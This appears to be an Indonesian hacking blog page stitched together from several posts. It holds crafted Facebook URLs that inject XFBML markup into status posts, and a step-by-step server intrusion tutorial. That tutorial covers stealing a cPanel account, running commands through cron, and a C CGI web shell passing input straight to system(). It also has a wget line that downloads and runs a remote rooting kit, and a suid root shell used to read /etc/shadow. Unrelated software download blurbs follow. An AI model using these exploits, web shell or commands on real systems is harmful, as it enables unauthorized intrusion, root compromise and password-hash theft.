Wednesday, 22 February 2012

FAcebook Status Update With XFBML injection



Sebelumnya saya mau minta maaf kepada BinusHacker Family karena baru ada kesempata berkunjung ke BinusHacker.
Beberapa waktu yang lalu saya pernah memposting artikel Tweaking Facebook Status with HTML button di sini dan di sini. Artikel kali ini akan membahas tentang Tweaking Facebook yaitu Update Status Dengan XFBML Injection. Dengan sedikit tweaking ini, kita bisa melakukan sebuak injeksi pada url Facebook lalu kemudian membagikan hasilnya pada status Facebook kita.
Berikut preview dan url code-nya


CAPTCHA : http://www.facebook.com/cyber4rt/posts/226958147350609

http://www.facebook.com/connect/prompt_feed.php?&attachment={%27href%27:%27http://t.co/q3EzkPR%27,%27name%27:%27%20%3Ccenter%3E%3Cbutton+type%3D%22button%22%3EMengamankan%20Facebook%20Terbaru%3C/button%3E%3C/center%3E%3Cfb:captcha%20showalways=%22true%22%20/%3E%3Cinput%20type=%22submit%22%20/%3E%3C/form%3E%3Cbutton+type%3D%22button%22%3Ekirim%20%3C/button%3E%27}
TEXT AREA : http://www.facebook.com/cyber4rt/posts/248470535173103

http://www.facebook.com/connect/prompt_feed.php?&api_key=209403259107231&attachment={%27name%27:%27%20%3Ccenter%3E%3Cfb:editor-text%20label=%22Powered%20By%22%20name=%22title%22%20value=%22%20http://blog.cyber4rt.com%22/%3E%3C/br%3E%3Ccenter%3E%3C/center%3E%3Cfb:editor-textarea%20label=%22Komentar%20Anda%22%20name=%22comment%22%20value=%22%20JEMPOL%22/%3E%3Cfb:editor-buttonset%3E%3Ccenter%3E%3Cbutton+type%3D%22button%22%3EKomentari%3C/button%3E%3C/center%3E%27}

LIVE STREAM : http://www.facebook.com/cyber4rt/posts/161116127297514
http://www.facebook.com/connect/prompt_feed.php?display=touch&api_key=209403259107231&link=http://t.co/q3EzkPR&attachment={%27description%27%3A%27%3Cfb:live-stream%20event_app_id=%22266225821384%22%20width=%22400%22%20height=%22500%22%20xid=%22%22%20via_url=%22http://t.co/q3EzkPR%22%20always_post_to_friends=%22false%22%3E%3C/fb:live-stream%3E+%27}
Klik salah satu url code di atas, lalu bagikan seperti biasa anda meng-update status Facebook.
Jika ada yang ingin ditanyakan, silakan berkomentar di sini :)
it’s all about 4rt, not how smart you are
http://blog.cyber4rt.com/tweaking/facebook-status-update-with-xfbml-injection/
http://www.thehackernews.com/2011/08/facebook-status-update-with-xfbml.html

bypass disable function, disable cgi python, cgi perl di target dg cgi bin

bypass disable function, disable cgi python, cgi perl di target dg cgi bin


by: Viscount

yup kali ini akan kita mainkan salah satu dari permainan rahasia yang paling mudah (teknik ini hanya utk pemula yg baru belajar membypass)

yang biasa dipakai attacker dalam membypass (masih banyak teknik2 lainya yg bisa dipakai si attacker untuk membypass).


misal pada target terdapat disable function php berikut ini:

disable_functions: ini_alter,system,passthru,shell_exec,leak,listen,chgrp,apache_setenv,define_syslog_variables,openlog,syslog,ftp_exec,posix_getpwuid,posix_getpwnam


lalu kita mencoba mengupload shell cgi perl maupun python ke cgi-bin tapi sayangnya setelah diupload crut:

===

Internal Server Error


The server encountered an internal error or misconfiguration and was unable to complete your request.


Please contact the server administrator, webmaster@adhdsociety.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.


More information about this error may be available in the server error log.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

=====


karena masalah path atau krn perl atau python pantang kita exec (permission denied bo)


untuk mengatasi permasalahan di atas bisa dg mencolong satu cpanel di server itu lalu setelah masuk ke cpanel

liat di bag biasanya ada cron, dari situ kita bisa pakai untuk menjalankan perintah shell:

[Image: kue.jpg]


selanjutnya bikin cron baru, pilih common setting, pilih every minute:


misal perintahnya: id > id.txt


[Image: kue2.jpg]


selanjutnya jika berhasil maka kita bisa melihat hasil jalanya perintah di file id.txt tadi yang akan tersimpan di /home/usercpanelyangkitaboboltadi hasil perintah akan bisa kita lihat 1 menit kemudian





misal kita liat hasil pocnya seperti di bawah ini:

[Image: kue3.jpg]


nah karena teknik di atas akan berjalan sangat lama krn harus menunggu cron permenit kita akan gali lagi lebih dalam.

banyak teknik yang bisa dipakai. misal dg cgi shell dari c :


=====

Code:
/**

CGI Shell in C

made by : ev1lut10n

**/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>


static void kotak_cmd()

{

printf("%s","<br><form action=?");

printf("%s","method=get>");

printf("%s","shell command : <input type=text");

printf("%s"," name=cmd>");

printf("%s","<input type=submit");

printf("%s"," value=execute>");

printf("%s","</form>");

}

static void set_heder()

{

  printf("%s%c%c\n","Content-Type:text/html;charset=iso-8859-1",13,10);

}



char *replace(char *st, char *orig, char *repl) {

  static char buffer[4096];

  char *ch;

  if (!(ch = strstr(st, orig)))

   return st;

  strncpy(buffer, st, ch-st);

  buffer[ch-st] = 0;

  sprintf(buffer+(ch-st), "%s%s", repl, ch+strlen(orig));

  return buffer;

  }



int main(void)

{

char *data;

char cmd[100];

char perintah[256]="";  

set_heder();

kotak_cmd();  

data = getenv("QUERY_STRING");

sscanf(data,"cmd=%s",cmd);

printf("\ncmd: |%s|\n",cmd);  

strcat(perintah,cmd);

    printf("\nperintah: |%s|\n",perintah);  

    system(perintah);


return 0;

}
=======================


compile: gcc -o cgi cgi.c


untuk rooting bisa menggunakan botnet (yang belum jadi dibuat sih)


==============


utk rooting, misal di cron tadi kita isikan perintah:

============================

wget http://testsite.swcteam.com/libraries/rooting.tgz;tar zxvf rooting.tgz;cd rooting;perl backup.pl

============================


jika berhasil melakukan root maka dalam beberapa menit kemudian file suid di direktori backups menjadi suid root

====

ev1lut10n@ev1lut10n-Vostro1310:~/www/backups$ ls -l suid

-rwsr-xr-x 1 root ev1lut10n 7292 2012-02-16 05:39 suid

=====


di mana kita bisa mengeksekusi perintah root:

misal:

====

ev1lut10n@ev1lut10n-Vostro1310:~/www/backups$ ./suid id

uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout)

===


utk perintah dg lebih dari 1 argumen:

=======

echo 'cat /etc/shadow'> cmd;./suid ./cmd

======

Nexa Alay Generator

Nexa Alay Generator

Buat Para anak Alay Yang ingin buat status
dengan bahasa Alay
wajib download
...
Sofware ini

Download


For SS

Nexa Facebook Emotion

Software Facebook Emotion

-Kekurangan tidak bisa menggunakan spasi

For SS

linknya
Disini

Kalo copas jangan lupa credit nya ya